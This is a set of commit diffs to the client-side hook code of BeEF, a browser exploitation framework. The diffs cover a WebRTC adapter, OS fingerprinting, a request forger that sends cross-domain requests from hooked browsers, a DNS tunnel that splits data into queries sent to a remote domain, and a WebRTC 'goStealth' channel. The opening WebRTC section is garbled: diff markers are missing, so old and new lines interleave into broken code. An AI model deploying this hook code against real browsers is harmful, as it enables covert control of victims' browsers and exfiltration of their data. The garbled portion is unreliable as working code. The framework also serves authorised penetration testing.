var reattachMediaStream = null;
var webrtcDetectedBrowser = null;
var webrtcDetectedVersion = null;
var webrtcMinimumVersion = null;
function maybeFixConfiguration(pcConfig) {
if (pcConfig === null) {
return;
function trace(text) {
// This function is used for logging.
if (text[text.length - 1] === '\n') {
text = text.substring(0, text.length - 1);
}
for (var i = 0; i < pcConfig.iceServers.length; i++) {
if (pcConfig.iceServers[i].hasOwnProperty('urls')){
if (pcConfig.iceServers[i]['urls'].length > 0) {
// In FF - we just take the FIRST STUN Server
pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'][0];
} else {
pcConfig.iceServers[i]['url'] = pcConfig.iceServers[i]['urls'];
}
delete pcConfig.iceServers[i]['urls'];
}
if (window.performance) {
var now = (window.performance.now() / 1000).toFixed(3);
beef.debug(now + ': ' + text);
} else {
beef.debug(text);
}
}
if (navigator.mozGetUserMedia) {
webrtcDetectedBrowser = "firefox";
webrtcDetectedBrowser = 'firefox';
// the detected firefox version.
webrtcDetectedVersion =
parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
// the minimum firefox version still supported by adapter.
webrtcMinimumVersion = 31;
// The RTCPeerConnection object.
var RTCPeerConnection = function(pcConfig, pcConstraints) {
// .urls is not supported in FF yet.
maybeFixConfiguration(pcConfig);
return new mozRTCPeerConnection(pcConfig, pcConstraints);
}
// The RTCSessionDescription object.
RTCSessionDescription = mozRTCSessionDescription;
// The RTCIceCandidate object.
RTCIceCandidate = mozRTCIceCandidate;
// Get UserMedia (only difference is the prefix).
// Code from Adam Barth.
getUserMedia = navigator.mozGetUserMedia.bind(navigator);
navigator.getUserMedia = getUserMedia;
// Creates iceServer from the url for FF.
createIceServer = function(url, username, password) {
var iceServer = null;
var url_parts = url.split(':');
if (url_parts[0].indexOf('stun') === 0) {
// Create iceServer with stun url.
iceServer = { 'url': url };
} else if (url_parts[0].indexOf('turn') === 0) {
if (webrtcDetectedVersion < 27) {
// Create iceServer with turn url.
// Ignore the transport parameter from TURN url for FF version <=27.
var turn_url_parts = url.split("?");
// Return null for createIceServer if transport=tcp.
if (turn_url_parts.length === 1 ||
turn_url_parts[1].indexOf('transport=udp') === 0) {
iceServer = {'url': turn_url_parts[0],
'credential': password,
'username': username};
window.RTCPeerConnection = function(pcConfig, pcConstraints) {
if (webrtcDetectedVersion < 38) {
// .urls is not supported in FF < 38.
// create RTCIceServers with a single url.
if (pcConfig && pcConfig.iceServers) {
var newIceServers = [];
for (var i = 0; i < pcConfig.iceServers.length; i++) {
var server = pcConfig.iceServers[i];
if (server.hasOwnProperty('urls')) {
for (var j = 0; j < server.urls.length; j++) {
var newServer = {
url: server.urls[j]
};
if (server.urls[j].indexOf('turn') === 0) {
newServer.username = server.username;
newServer.credential = server.credential;
}
newIceServers.push(newServer);
}
} else {
newIceServers.push(pcConfig.iceServers[i]);
}
}
} else {
// FF 27 and above supports transport parameters in TURN url,
// So passing in the full url to create iceServer.
iceServer = {'url': url,
'credential': password,
'username': username};
pcConfig.iceServers = newIceServers;
}
}
return iceServer;
return new mozRTCPeerConnection(pcConfig, pcConstraints);
};
createIceServers = function(urls, username, password) {
var iceServers = [];
// Use .url for FireFox.
for (i = 0; i < urls.length; i++) {
var iceServer = createIceServer(urls[i],
username,
password);
if (iceServer !== null) {
iceServers.push(iceServer);
}
}
return iceServers;
}
// The RTCSessionDescription object.
window.RTCSessionDescription = mozRTCSessionDescription;
// The RTCIceCandidate object.
window.RTCIceCandidate = mozRTCIceCandidate;
// getUserMedia constraints shim.
getUserMedia = (webrtcDetectedVersion < 38) ?
function(c, onSuccess, onError) {
var constraintsToFF37 = function(c) {
if (typeof c !== 'object' || c.require) {
return c;
}
var require = [];
Object.keys(c).forEach(function(key) {
var r = c[key] = (typeof c[key] === 'object') ?
c[key] : {ideal: c[key]};
if (r.exact !== undefined) {
r.min = r.max = r.exact;
delete r.exact;
}
if (r.min !== undefined || r.max !== undefined) {
require.push(key);
}
if (r.ideal !== undefined) {
c.advanced = c.advanced || [];
var oc = {};
oc[key] = {min: r.ideal, max: r.ideal};
c.advanced.push(oc);
delete r.ideal;
if (!Object.keys(r).length) {
delete c[key];
}
}
});
if (require.length) {
c.require = require;
}
return c;
};
beef.debug('spec: ' + JSON.stringify(c));
c.audio = constraintsToFF37(c.audio);
c.video = constraintsToFF37(c.video);
beef.debug('ff37: ' + JSON.stringify(c));
return navigator.mozGetUserMedia(c, onSuccess, onError);
} : navigator.mozGetUserMedia.bind(navigator);
navigator.getUserMedia = getUserMedia;
// Shim for mediaDevices on older versions.
if (!navigator.mediaDevices) {
navigator.mediaDevices = {getUserMedia: requestUserMedia,
addEventListener: function() { },
removeEventListener: function() { }
};
}
navigator.mediaDevices.enumerateDevices =
navigator.mediaDevices.enumerateDevices || function() {
return new Promise(function(resolve) {
var infos = [
{kind: 'audioinput', deviceId: 'default', label:'', groupId:''},
{kind: 'videoinput', deviceId: 'default', label:'', groupId:''}
];
resolve(infos);
});
};
if (webrtcDetectedVersion < 41) {
// Work around http://bugzil.la/1169665
var orgEnumerateDevices =
navigator.mediaDevices.enumerateDevices.bind(navigator.mediaDevices);
navigator.mediaDevices.enumerateDevices = function() {
return orgEnumerateDevices().catch(function(e) {
if (e.name === 'NotFoundError') {
return [];
}
throw e;
});
};
}
// Attach a media stream to an element.
attachMediaStream = function(element, stream) {
console.log("Attaching media stream");
beef.debug('Attaching media stream');
element.mozSrcObject = stream;
element.play();
};
reattachMediaStream = function(to, from) {
console.log("Reattaching media stream");
beef.debug('Reattaching media stream');
to.mozSrcObject = from.mozSrcObject;
to.play();
};
// Fake get{Video,Audio}Tracks
if (!MediaStream.prototype.getVideoTracks) {
MediaStream.prototype.getVideoTracks = function() {
return [];
};
}
if (!MediaStream.prototype.getAudioTracks) {
MediaStream.prototype.getAudioTracks = function() {
return [];
};
}
} else if (navigator.webkitGetUserMedia) {
webrtcDetectedBrowser = "chrome";
// Temporary fix until crbug/374263 is fixed.
// Setting Chrome version to 999, if version is unavailable.
var result = navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./);
if (result !== null) {
webrtcDetectedVersion = parseInt(result[2], 10);
} else {
webrtcDetectedVersion = 999;
}
webrtcDetectedBrowser = 'chrome';
// Creates iceServer from the url for Chrome M33 and earlier.
createIceServer = function(url, username, password) {
var iceServer = null;
var url_parts = url.split(':');
if (url_parts[0].indexOf('stun') === 0) {
// Create iceServer with stun url.
iceServer = { 'url': url };
} else if (url_parts[0].indexOf('turn') === 0) {
// Chrome M28 & above uses below TURN format.
iceServer = {'url': url,
'credential': password,
'username': username};
}
return iceServer;
};
// the detected chrome version.
webrtcDetectedVersion =
parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2], 10);
// Creates iceServers from the urls for Chrome M34 and above.
createIceServers = function(urls, username, password) {
var iceServers = [];
if (webrtcDetectedVersion >= 34) {
// .urls is supported since Chrome M34.
iceServers = {'urls': urls,
'credential': password,
'username': username };
} else {
for (i = 0; i < urls.length; i++) {
var iceServer = createIceServer(urls[i],
username,
password);
if (iceServer !== null) {
iceServers.push(iceServer);
}
}
}
return iceServers;
};
// the minimum chrome version still supported by adapter.
webrtcMinimumVersion = 38;
// The RTCPeerConnection object.
var RTCPeerConnection = function(pcConfig, pcConstraints) {
// .urls is supported since Chrome M34.
if (webrtcDetectedVersion < 34) {
maybeFixConfiguration(pcConfig);
}
return new webkitRTCPeerConnection(pcConfig, pcConstraints);
}
window.RTCPeerConnection = function(pcConfig, pcConstraints) {
var pc = new webkitRTCPeerConnection(pcConfig, pcConstraints);
var origGetStats = pc.getStats.bind(pc);
pc.getStats = function(selector, successCallback, errorCallback) { // jshint ignore: line
// If selector is a function then we are in the old style stats so just
// pass back the original getStats format to avoid breaking old users.
if (typeof selector === 'function') {
return origGetStats(selector, successCallback);
}
// Get UserMedia (only difference is the prefix).
// Code from Adam Barth.
getUserMedia = navigator.webkitGetUserMedia.bind(navigator);
var fixChromeStats = function(response) {
var standardReport = {};
var reports = response.result();
reports.forEach(function(report) {
var standardStats = {
id: report.id,
timestamp: report.timestamp,
type: report.type
};
report.names().forEach(function(name) {
standardStats[name] = report.stat(name);
});
standardReport[standardStats.id] = standardStats;
});
return standardReport;
};
var successCallbackWrapper = function(response) {
successCallback(fixChromeStats(response));
};
return origGetStats(successCallbackWrapper, selector);
};
return pc;
};
// add promise support
['createOffer', 'createAnswer'].forEach(function(method) {
var nativeMethod = webkitRTCPeerConnection.prototype[method];
webkitRTCPeerConnection.prototype[method] = function() {
var self = this;
if (arguments.length < 1 || (arguments.length === 1 &&
typeof(arguments[0]) === 'object')) {
var opts = arguments.length === 1 ? arguments[0] : undefined;
return new Promise(function(resolve, reject) {
nativeMethod.apply(self, [resolve, reject, opts]);
});
} else {
return nativeMethod.apply(this, arguments);
}
};
});
['setLocalDescription', 'setRemoteDescription',
'addIceCandidate'].forEach(function(method) {
var nativeMethod = webkitRTCPeerConnection.prototype[method];
webkitRTCPeerConnection.prototype[method] = function() {
var args = arguments;
var self = this;
return new Promise(function(resolve, reject) {
nativeMethod.apply(self, [args[0],
function() {
resolve();
if (args.length >= 2) {
args[1].apply(null, []);
}
},
function(err) {
reject(err);
if (args.length >= 3) {
args[2].apply(null, [err]);
}
}]
);
});
};
});
// getUserMedia constraints shim.
getUserMedia = function(c, onSuccess, onError) {
var constraintsToChrome = function(c) {
if (typeof c !== 'object' || c.mandatory || c.optional) {
return c;
}
var cc = {};
Object.keys(c).forEach(function(key) {
if (key === 'require' || key === 'advanced') {
return;
}
var r = (typeof c[key] === 'object') ? c[key] : {ideal: c[key]};
if (r.exact !== undefined && typeof r.exact === 'number') {
r.min = r.max = r.exact;
}
var oldname = function(prefix, name) {
if (prefix) {
return prefix + name.charAt(0).toUpperCase() + name.slice(1);
}
return (name === 'deviceId') ? 'sourceId' : name;
};
if (r.ideal !== undefined) {
cc.optional = cc.optional || [];
var oc = {};
if (typeof r.ideal === 'number') {
oc[oldname('min', key)] = r.ideal;
cc.optional.push(oc);
oc = {};
oc[oldname('max', key)] = r.ideal;
cc.optional.push(oc);
} else {
oc[oldname('', key)] = r.ideal;
cc.optional.push(oc);
}
}
if (r.exact !== undefined && typeof r.exact !== 'number') {
cc.mandatory = cc.mandatory || {};
cc.mandatory[oldname('', key)] = r.exact;
} else {
['min', 'max'].forEach(function(mix) {
if (r[mix] !== undefined) {
cc.mandatory = cc.mandatory || {};
cc.mandatory[oldname(mix, key)] = r[mix];
}
});
}
});
if (c.advanced) {
cc.optional = (cc.optional || []).concat(c.advanced);
}
return cc;
};
beef.debug('spec: ' + JSON.stringify(c)); // whitespace for alignment
c.audio = constraintsToChrome(c.audio);
c.video = constraintsToChrome(c.video);
beef.debug('chrome: ' + JSON.stringify(c));
return navigator.webkitGetUserMedia(c, onSuccess, onError);
};
navigator.getUserMedia = getUserMedia;
// Attach a media stream to an element.
attachMediaStream = function(element, stream) {
if (typeof element.srcObject !== 'undefined') {
element.srcObject = stream;
} else if (typeof element.mozSrcObject !== 'undefined') {
element.mozSrcObject = stream;
} else if (typeof element.src !== 'undefined') {
element.src = URL.createObjectURL(stream);
} else {
console.log('Error attaching stream to element.');
beef.debug('Error attaching stream to element.');
}
};
reattachMediaStream = function(to, from) {
to.src = from.src;
};
if (!navigator.mediaDevices) {
navigator.mediaDevices = {getUserMedia: requestUserMedia,
enumerateDevices: function() {
return new Promise(function(resolve) {
var kinds = {audio: 'audioinput', video: 'videoinput'};
return MediaStreamTrack.getSources(function(devices) {
resolve(devices.map(function(device) {
return {label: device.label,
kind: kinds[device.kind],
deviceId: device.id,
groupId: ''};
}));
});
});
}};
// in case someone wants to listen for the devicechange event.
navigator.mediaDevices.addEventListener = function() { };
navigator.mediaDevices.removeEventListener = function() { };
}
} else if (navigator.mediaDevices && navigator.userAgent.match(
/Edge\/(\d+).(\d+)$/)) {
webrtcDetectedBrowser = 'edge';
webrtcDetectedVersion =
parseInt(navigator.userAgent.match(/Edge\/(\d+).(\d+)$/)[2], 10);
// the minimum version still supported by adapter.
webrtcMinimumVersion = 12;
attachMediaStream = function(element, stream) {
element.srcObject = stream;
};
reattachMediaStream = function(to, from) {
to.srcObject = from.srcObject;
};
} else {
console.log("Browser does not appear to be WebRTC-capable");
// console.log('Browser does not appear to be WebRTC-capable');
}
// Returns the result of getUserMedia as a Promise.
function requestUserMedia(constraints) {
return new Promise(function(resolve, reject) {
getUserMedia(constraints, resolve, reject);
});
}
if (typeof module !== 'undefined') {
module.exports = {
RTCPeerConnection: window.RTCPeerConnection,
getUserMedia: getUserMedia,
attachMediaStream: attachMediaStream,
reattachMediaStream: reattachMediaStream,
webrtcDetectedBrowser: webrtcDetectedBrowser,
webrtcDetectedVersion: webrtcDetectedVersion,
webrtcMinimumVersion: webrtcMinimumVersion
//requestUserMedia: not exposed on purpose.
//trace: not exposed on purpose.
};
} else if ((typeof require === 'function') && (typeof define === 'function')) {
// Expose objects and functions when RequireJS is doing the loading.
define([], function() {
return {
RTCPeerConnection: window.RTCPeerConnection,
getUserMedia: getUserMedia,
attachMediaStream: attachMediaStream,
reattachMediaStream: reattachMediaStream,
webrtcDetectedBrowser: webrtcDetectedBrowser,
webrtcDetectedVersion: webrtcDetectedVersion,
webrtcMinimumVersion: webrtcMinimumVersion
//requestUserMedia: not exposed on purpose.
//trace: not exposed on purpose.
};
});
}

32
core/main/client/net.js
View File

@@ -35,6 +35,7 @@ beef.net = {
command: function () {
this.cid = null;
this.results = null;
this.status = null;
this.handler = null;
this.callback = null;
},
@@ -84,13 +85,15 @@ beef.net = {
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Integer} status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param: {Function} callback: the function to call after execution
*/
queue: function (handler, cid, results, callback) {
queue: function (handler, cid, results, status, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
s.cid = cid;
s.results = beef.net.clean(results);
s.status = status;
s.callback = callback;
s.handler = handler;
this.cmd_queue.push(s);
@@ -105,22 +108,32 @@ beef.net = {
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Integer} exec_status: the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')
* @param: {Function} callback: the function to call after execution
* @return: {Integer} exec_status: the command module execution status (defaults to 0 - 'unknown' if status is null)
*/
send: function (handler, cid, results, callback) {
send: function (handler, cid, results, exec_status, callback) {
// defaults to 'unknown' execution status if no parameter is provided, otherwise set the status
var status = 0;
if (exec_status != null && parseInt(Number(exec_status)) == exec_status){ status = exec_status}
if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
this.queue(handler, cid, results, callback);
this.queue(handler, cid, results, status, callback);
this.flush();
} else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
'", "status": "' + exec_status +
'", "callback": "' + callback +
'","bh":"' + beef.session.get_hook_session_id() + '" }');
} catch (e) {
this.queue(handler, cid, results, callback);
this.queue(handler, cid, results, status, callback);
this.flush();
}
}
return status;
},
/**
@@ -257,6 +270,7 @@ beef.net = {
response.status_code = jqXHR.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
response.port_status = "open";
},
complete: function (jqXHR, textStatus) {
response.status_code = jqXHR.status;
@@ -273,7 +287,7 @@ beef.net = {
response.port_status = "open";
}
}
}).done(function () {
}).always(function () {
if (callback != null) {
callback(response);
}
@@ -287,6 +301,10 @@ beef.net = {
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
* beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
@@ -362,6 +380,8 @@ beef.net = {
}
},
data: data,
// http server responded successfully
success: function (data, textStatus, xhr) {
var end_time = new Date().getTime();

47
core/main/client/net/connection.js Normal file
View File

@@ -0,0 +1,47 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// beef.net.connection - wraps Mozilla's Network Information API
// https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
// https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
beef.net.connection = {
/* Returns the connection type
* @example: beef.net.connection.type()
* @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
* @return: {String} connection type or 'unknown'.
**/
type: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var type = connection.type;
if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection type: " + e.message);
return 'unknown';
}
},
/* Returns the maximum downlink speed of the connection
* @example: beef.net.connection.downlinkMax()
* @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
* @return: {String} downlink max or 'unknown'.
**/
downlinkMax: function () {
try {
var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
var max = connection.downlinkMax;
if (max) return max; else return 'unknown';
} catch(e) {
beef.debug("Error retrieving connection downlink max: " + e.message);
return 'unknown';
}
}
};
beef.regCmp('beef.net.connection');

11
core/main/client/net/dns.js
View File

@@ -30,9 +30,8 @@ beef.net.dns = {
var encodedData = encodeURI(encode_data(data));
//TODO remove this
console.log(encodedData);
console.log("_encodedData_ length: " + encodedData.length);
beef.debug(encodedData);
beef.debug("_encodedData_ length: " + encodedData.length);
// limitations to DNS according to RFC 1035:
// o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
@@ -50,8 +49,7 @@ beef.net.dns = {
var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
var max_data_segment_length = 63; // by RFC
//TODO remove this
console.log("max_data_segment_length: " + max_data_segment_length);
beef.debug("max_data_segment_length: " + max_data_segment_length);
var dom = document.createElement('b');
@@ -76,8 +74,7 @@ beef.net.dns = {
var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
//TODO remove this
console.log(segments.length);
beef.debug(segments.length);
for (var seq=1; seq<=segments.length; seq++) {
sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);

4
core/main/client/net/requester.js
View File

@@ -21,8 +21,8 @@ beef.net.requester = {
send: function(requests_array) {
for(var i=0; i<requests_array.length; i++){
request = requests_array[i];
beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,

89
core/main/client/os.js
View File

@@ -30,6 +30,7 @@ beef.os = {
return result;
},
// the likelihood that we hook Windows 3.11 (which has only Win in the UA string) is zero in 2015
isWin311: function() {
return (this.ua.match('(Win16)')) ? true : false;
},
@@ -101,6 +102,19 @@ beef.os = {
return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
},
isOsxYosemite: function(){ // TODO
return (this.ua.match('(OS X 10_10)|(OS X 10.10)')) ? true : false;
},
isOsxMavericks: function(){ // TODO
return (this.ua.match('(OS X 10_9)|(OS X 10.9)')) ? true : false;
},
isOsxSnowLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_8)|(OS X 10.8)')) ? true : false;
},
isOsxLeopard: function(){ // TODO
return (this.ua.match('(OS X 10_7)|(OS X 10.7)')) ? true : false;
},
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
@@ -142,34 +156,24 @@ beef.os = {
},
isWindows: function() {
return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWin81() || this.isWinPhone();
return (this.ua.match('Windows')) ? true : false;
},
getName: function() {
//Windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWinCE()) return 'Windows CE';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWin2000SP1()) return 'Windows 2000 SP1';
if(this.isWinXP()) return 'Windows XP';
if(this.isWinServer2003()) return 'Windows Server 2003';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWin8()) return 'Windows 8';
if(this.isWin81()) return 'Windows 8.1';
if(this.isWindows()){
return 'Windows';
}
if(this.isMacintosh()) {
return 'OSX';
}
//Nokia
if(this.isNokia()) {
if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
//return 'Nokia';
}
// BlackBerry
@@ -178,9 +182,11 @@ beef.os = {
// Android
if(this.isAndroid()) return 'Android';
//linux
// SunOS
if(this.isSunOS()) return 'SunOS';
//Linux
if(this.isLinux()) return 'Linux';
if(this.isSunOS()) return 'Sun OS';
//iPhone
if (this.isIphone()) return 'iOS';
@@ -188,17 +194,6 @@ beef.os = {
if (this.isIpad()) return 'iOS';
//iPod
if (this.isIpod()) return 'iOS';
// zune
//if (this.isZune()) return 'Zune';
//macintosh
if(this.isMacintosh()) {
if((typeof navigator.oscpu != 'undefined') && (navigator.oscpu.indexOf('Mac OS')!=-1))
return navigator.oscpu;
return 'Macintosh';
}
//others
if(this.isQNX()) return 'QNX';
@@ -206,6 +201,36 @@ beef.os = {
if(this.isWebOS()) return 'webOS';
return 'unknown';
},
getVersion: function(){
//Windows
if(this.isWindows()) {
if (this.isWin81()) return '8.1';
if (this.isWin8()) return '8';
if (this.isWin7()) return '7';
if (this.isWinVista()) return 'Vista';
if (this.isWinXP()) return 'XP';
if (this.isWinServer2003()) return 'Server 2003';
if (this.isWin2000SP1()) return '2000 SP1';
if (this.isWin2000()) return '2000';
if (this.isWinME()) return 'Millenium';
if (this.isWinNT4()) return 'NT 4';
if (this.isWinCE()) return 'CE';
if (this.isWin95()) return '95';
if (this.isWin98()) return '98';
}
// OS X
if(this.isMacintosh()) {
if (this.isOsxYosemite()) return '10.10';
if (this.isOsxMavericks()) return '10.9';
if (this.isOsxSnowLeopard()) return '10.8';
if (this.isOsxLeopard()) return '10.7';
}
// TODO add Android/iOS version detection
}
};

2
core/main/client/timeout.js
View File

@@ -14,4 +14,4 @@
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor
*/
setTimeout(beef_init, 1000);
//setTimeout(beef_init, 1000);

223
core/main/client/webrtc.js
View File

@@ -67,10 +67,12 @@ Beefwebrtc.prototype.initialize = function() {
// Initialise the pcConfig hash with the provided stunservers
var stuns = JSON.parse(this.stunservers);
this.pcConfig = {"iceServers": [{"urls":stuns}]};
this.pcConfig = {"iceServers": [{"urls":stuns, "username":"user",
"credential":"pass"}]};
// We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
this.forceTurn(this.turnjson);
// this.forceTurn(this.turnjson);
this.turnDone = true;
// Caller is always ready to create peerConnection.
this.signalingReady = this.initiator;
@@ -96,32 +98,27 @@ Beefwebrtc.prototype.forceTurn = function(jason) {
if (iceServers !== null) {
this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
}
if (this.verbose) {console.log("Got TURN servers, will try and maybestart again..");}
beef.debug("Got TURN servers, will try and maybestart again..");
this.turnDone = true;
this.maybeStart();
}
// Try and establish the RTC connection
Beefwebrtc.prototype.createPeerConnection = function() {
if (this.verbose) {
console.log('Creating RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
}
beef.debug('Creating RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
try {
// Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
if (this.verbose) {
console.log('Created RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
}
beef.debug('Created RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
} catch (e) {
if (this.verbose) {
console.log('Failed to create PeerConnection, exception: ');
console.log(e);
}
beef.debug('Failed to create PeerConnection, exception: ');
beef.debug(e);
return;
}
@@ -142,10 +139,8 @@ Beefwebrtc.prototype.onIceCandidate = function(event) {
}
}
if (beefrtcs[peerid].verbose) {
console.log("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
console.log(event);
}
beef.debug("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
beef.debug(event);
if (event.candidate) {
// Send the candidate to the peer via the BeEF signalling channel
@@ -156,7 +151,7 @@ Beefwebrtc.prototype.onIceCandidate = function(event) {
// Note this ICE candidate locally
beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
} else {
if (beefrtcs[peerid].verbose) {console.log('End of candidates.');}
beef.debug('End of candidates.');
}
}
@@ -164,26 +159,24 @@ Beefwebrtc.prototype.onIceCandidate = function(event) {
// This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
// against the message directly
Beefwebrtc.prototype.processMessage = function(message) {
if (this.verbose) {
console.log('Signalling Message - S->C: ' + JSON.stringify(message));
}
beef.debug('Signalling Message - S->C: ' + JSON.stringify(message));
var msg = JSON.parse(message);
if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
if (this.verbose) {console.log('processing the message, as a receiver');}
beef.debug('processing the message, as a receiver');
if (msg.type === 'offer') { // This IS an SDP Offer
if (this.verbose) {console.log('.. and the message is an offer .. ');}
beef.debug('.. and the message is an offer .. ');
this.msgQueue.unshift(msg); // put it on the top of the msgqueue
this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
} else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
if (this.verbose) {console.log(' .. the message is NOT an offer .. ');}
beef.debug(' .. the message is NOT an offer .. ');
this.msgQueue.push(msg);
}
} else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
if (this.verbose) {console.log('processing the message, as the sender, no answers yet');}
beef.debug('processing the message, as the sender, no answers yet');
if (msg.type === 'answer') { // This IS an SDP Answer
if (this.verbose) {console.log('.. and we have an answer ..');}
beef.debug('.. and we have an answer ..');
this.processSignalingMessage(msg); // Process the message directly
this.gotanswer = true; // We have now received an answer
//process all other queued message...
@@ -191,11 +184,11 @@ Beefwebrtc.prototype.processMessage = function(message) {
this.processSignalingMessage(this.msgQueue.shift());
}
} else { // This is NOT an SDP Answer - as the caller, just add it to the queue
if (this.verbose) {console.log('.. not an answer ..');}
beef.debug('.. not an answer ..');
this.msgQueue.push(msg);
}
} else { // For all other messages just drop them in the queue
if (this.verbose) {console.log('processing a message, but, not as a receiver, OR, the rtc is already up');}
beef.debug('processing a message, but, not as a receiver, OR, the rtc is already up');
this.processSignalingMessage(msg);
}
}
@@ -203,7 +196,7 @@ Beefwebrtc.prototype.processMessage = function(message) {
// Send a signalling message ..
Beefwebrtc.prototype.sendSignalMsg = function(message) {
var msgString = JSON.stringify(message);
if (this.verbose) {console.log('Signalling Message - C->S: ' + msgString);}
beef.debug('Signalling Message - C->S: ' + msgString);
beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
}
@@ -217,15 +210,7 @@ Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
// When the signalling state changes. We don't actually do anything with this except log it.
Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
var localverbose = false;
for (var k in beefrtcs) {
if (beefrtcs[k].verbose === true) {
localverbose = true;
}
}
if (localverbose === true) {console.log("Signalling has changed to: " + event.target.signalingState);}
beef.debug("Signalling has changed to: " + event.target.signalingState);
}
// When the ICE Connection State changes - this is useful to determine connection statuses with peers.
@@ -238,7 +223,7 @@ Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
}
}
if (beefrtcs[peerid].verbose) {console.log("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);}
beef.debug("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);
// ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for
// better candidates or connections
@@ -281,7 +266,7 @@ Beefwebrtc.prototype.goStealth = function() {
beef.updater.lock = true;
